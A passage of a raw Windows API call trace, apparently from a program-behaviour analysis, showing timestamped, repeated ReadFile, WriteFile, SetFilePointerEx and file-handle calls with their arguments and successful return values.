lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] GetFileType (hFile=0x4c) returned 0x1 [0094.272] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.272] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.273] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.273] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.273] GetFileType (hFile=0x4c) returned 0x1 [0094.273] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.273] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.273] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.273] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.274] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.274] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.274] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.275] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.275] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.275] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.276] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.276] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.276] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.277] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.277] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.277] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.278] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.278] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.278] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.279] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.279] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.280] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.280] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.280] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, 